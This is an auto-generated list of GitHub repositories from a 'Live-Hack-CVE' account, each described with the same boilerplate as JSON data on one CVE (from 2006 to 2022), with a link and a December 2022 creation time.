**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14437](https://github.com/Live-Hack-CVE/CVE-2017-14437) create time: 2022-12-23T03:53:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14481](https://github.com/Live-Hack-CVE/CVE-2017-14481) create time: 2022-12-23T03:53:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14436 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14436](https://github.com/Live-Hack-CVE/CVE-2017-14436) create time: 2022-12-23T03:53:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14434](https://github.com/Live-Hack-CVE/CVE-2017-14434) create time: 2022-12-23T03:53:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14440 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14440](https://github.com/Live-Hack-CVE/CVE-2017-14440) create time: 2022-12-23T03:53:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14433 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14433](https://github.com/Live-Hack-CVE/CVE-2017-14433) create time: 2022-12-23T03:53:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14441 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14441](https://github.com/Live-Hack-CVE/CVE-2017-14441) create time: 2022-12-23T03:53:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14442 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14442](https://github.com/Live-Hack-CVE/CVE-2017-14442) create time: 2022-12-23T03:53:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16346 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16346](https://github.com/Live-Hack-CVE/CVE-2017-16346) create time: 2022-12-23T03:53:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16345 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16345](https://github.com/Live-Hack-CVE/CVE-2017-16345) create time: 2022-12-23T03:53:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16341 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16341](https://github.com/Live-Hack-CVE/CVE-2017-16341) create time: 2022-12-23T03:52:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16339 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16339](https://github.com/Live-Hack-CVE/CVE-2017-16339) create time: 2022-12-23T03:52:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16338](https://github.com/Live-Hack-CVE/CVE-2017-16338) create time: 2022-12-23T03:52:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16337 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16337](https://github.com/Live-Hack-CVE/CVE-2017-16337) create time: 2022-12-23T03:52:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16255 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16255](https://github.com/Live-Hack-CVE/CVE-2017-16255) create time: 2022-12-23T03:52:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16254 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16254](https://github.com/Live-Hack-CVE/CVE-2017-16254) create time: 2022-12-23T03:52:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16253 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16253](https://github.com/Live-Hack-CVE/CVE-2017-16253) create time: 2022-12-23T03:52:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-16252 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-16252](https://github.com/Live-Hack-CVE/CVE-2017-16252) create time: 2022-12-23T03:52:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14480 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14480](https://github.com/Live-Hack-CVE/CVE-2017-14480) create time: 2022-12-23T03:52:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14479 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14479](https://github.com/Live-Hack-CVE/CVE-2017-14479) create time: 2022-12-23T03:52:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14478 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14478](https://github.com/Live-Hack-CVE/CVE-2017-14478) create time: 2022-12-23T03:52:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20446 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20446](https://github.com/Live-Hack-CVE/CVE-2019-20446) create time: 2022-12-23T04:19:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19725 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19725](https://github.com/Live-Hack-CVE/CVE-2019-19725) create time: 2022-12-23T04:19:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16167](https://github.com/Live-Hack-CVE/CVE-2019-16167) create time: 2022-12-23T04:19:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18265 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18265](https://github.com/Live-Hack-CVE/CVE-2019-18265) create time: 2022-12-23T03:55:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4075 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4075](https://github.com/Live-Hack-CVE/CVE-2019-4075) create time: 2022-12-23T03:49:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4136 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4136](https://github.com/Live-Hack-CVE/CVE-2019-4136) create time: 2022-12-23T03:49:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35527 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35527](https://github.com/Live-Hack-CVE/CVE-2020-35527) create time: 2022-12-23T04:18:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39077 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39077](https://github.com/Live-Hack-CVE/CVE-2021-39077) create time: 2022-12-23T04:20:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41164](https://github.com/Live-Hack-CVE/CVE-2021-41164) create time: 2022-12-23T04:19:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35368 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35368](https://github.com/Live-Hack-CVE/CVE-2021-35368) create time: 2022-12-23T04:19:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43618](https://github.com/Live-Hack-CVE/CVE-2021-43618) create time: 2022-12-23T04:19:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4203 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4203](https://github.com/Live-Hack-CVE/CVE-2021-4203) create time: 2022-12-23T04:18:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45451 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45451](https://github.com/Live-Hack-CVE/CVE-2021-45451) create time: 2022-12-23T04:18:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29454 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29454](https://github.com/Live-Hack-CVE/CVE-2021-29454) create time: 2022-12-23T04:18:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21408 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21408](https://github.com/Live-Hack-CVE/CVE-2021-21408) create time: 2022-12-23T04:18:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3979 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3979](https://github.com/Live-Hack-CVE/CVE-2021-3979) create time: 2022-12-23T04:18:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33621 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33621](https://github.com/Live-Hack-CVE/CVE-2021-33621) create time: 2022-12-23T03:51:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44228 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44228](https://github.com/Live-Hack-CVE/CVE-2021-44228) create time: 2022-12-23T03:51:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3885](https://github.com/Live-Hack-CVE/CVE-2022-3885) create time: 2022-12-23T04:20:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3887](https://github.com/Live-Hack-CVE/CVE-2022-3887) create time: 2022-12-23T04:20:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3889 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3889](https://github.com/Live-Hack-CVE/CVE-2022-3889) create time: 2022-12-23T04:20:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3888](https://github.com/Live-Hack-CVE/CVE-2022-3888) create time: 2022-12-23T04:20:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3314 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3314](https://github.com/Live-Hack-CVE/CVE-2022-3314) create time: 2022-12-23T04:20:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3315 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3315](https://github.com/Live-Hack-CVE/CVE-2022-3315) create time: 2022-12-23T04:20:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3313](https://github.com/Live-Hack-CVE/CVE-2022-3313) create time: 2022-12-23T04:19:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3723 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3723](https://github.com/Live-Hack-CVE/CVE-2022-3723) create time: 2022-12-23T04:19:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3661 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3661](https://github.com/Live-Hack-CVE/CVE-2022-3661) create time: 2022-12-23T04:19:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3170 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3170](https://github.com/Live-Hack-CVE/CVE-2022-3170) create time: 2022-12-23T04:19:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24637 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24637](https://github.com/Live-Hack-CVE/CVE-2022-24637) create time: 2022-12-23T04:18:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24728 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24728](https://github.com/Live-Hack-CVE/CVE-2022-24728) create time: 2022-12-23T04:18:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24729 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24729](https://github.com/Live-Hack-CVE/CVE-2022-24729) create time: 2022-12-23T04:18:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3278 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3278](https://github.com/Live-Hack-CVE/CVE-2022-3278) create time: 2022-12-23T04:18:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3296](https://github.com/Live-Hack-CVE/CVE-2022-3296) create time: 2022-12-23T04:18:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3297 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3297](https://github.com/Live-Hack-CVE/CVE-2022-3297) create time: 2022-12-23T04:18:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29221](https://github.com/Live-Hack-CVE/CVE-2022-29221) create time: 2022-12-23T04:18:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32429 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32429](https://github.com/Live-Hack-CVE/CVE-2022-32429) create time: 2022-12-23T04:18:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0216 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0216](https://github.com/Live-Hack-CVE/CVE-2022-0216) create time: 2022-12-23T04:18:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34749 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34749](https://github.com/Live-Hack-CVE/CVE-2022-34749) create time: 2022-12-23T04:18:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31188 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31188](https://github.com/Live-Hack-CVE/CVE-2022-31188) create time: 2022-12-23T04:17:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28131 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28131](https://github.com/Live-Hack-CVE/CVE-2022-28131) create time: 2022-12-23T04:17:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42012 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42012](https://github.com/Live-Hack-CVE/CVE-2022-42012) create time: 2022-12-23T04:17:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42011 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42011](https://github.com/Live-Hack-CVE/CVE-2022-42011) create time: 2022-12-23T04:17:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42010 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42010](https://github.com/Live-Hack-CVE/CVE-2022-42010) create time: 2022-12-23T04:17:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41211 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41211](https://github.com/Live-Hack-CVE/CVE-2022-41211) create time: 2022-12-23T04:17:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41205 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41205](https://github.com/Live-Hack-CVE/CVE-2022-41205) create time: 2022-12-23T04:17:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42791 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42791](https://github.com/Live-Hack-CVE/CVE-2022-42791) create time: 2022-12-23T04:17:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41260 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41260](https://github.com/Live-Hack-CVE/CVE-2022-41260) create time: 2022-12-23T04:17:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42799](https://github.com/Live-Hack-CVE/CVE-2022-42799) create time: 2022-12-23T04:17:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2006-3240 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2006-3240](https://github.com/Live-Hack-CVE/CVE-2006-3240) create time: 2022-12-23T03:13:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0985 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0985](https://github.com/Live-Hack-CVE/CVE-2016-0985) create time: 2022-12-23T03:01:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-7913 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-7913](https://github.com/Live-Hack-CVE/CVE-2016-7913) create time: 2022-12-23T02:58:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-9313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-9313](https://github.com/Live-Hack-CVE/CVE-2016-9313) create time: 2022-12-23T02:57:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9929 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9929](https://github.com/Live-Hack-CVE/CVE-2017-9929) create time: 2022-12-23T03:18:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-9928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-9928](https://github.com/Live-Hack-CVE/CVE-2017-9928) create time: 2022-12-23T03:14:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8847 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8847](https://github.com/Live-Hack-CVE/CVE-2017-8847) create time: 2022-12-23T03:14:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8846 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8846](https://github.com/Live-Hack-CVE/CVE-2017-8846) create time: 2022-12-23T03:14:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8845 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8845](https://github.com/Live-Hack-CVE/CVE-2017-8845) create time: 2022-12-23T03:14:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8844 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8844](https://github.com/Live-Hack-CVE/CVE-2017-8844) create time: 2022-12-23T03:14:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-8843 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-8843](https://github.com/Live-Hack-CVE/CVE-2017-8843) create time: 2022-12-23T03:12:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-7604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-7604](https://github.com/Live-Hack-CVE/CVE-2017-7604) create time: 2022-12-23T03:12:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-7603 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-7603](https://github.com/Live-Hack-CVE/CVE-2017-7603) create time: 2022-12-23T03:12:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19939 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19939](https://github.com/Live-Hack-CVE/CVE-2018-19939) create time: 2022-12-23T03:12:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4135](https://github.com/Live-Hack-CVE/CVE-2019-4135) create time: 2022-12-23T03:18:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4083 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4083](https://github.com/Live-Hack-CVE/CVE-2019-4083) create time: 2022-12-23T03:18:16Z

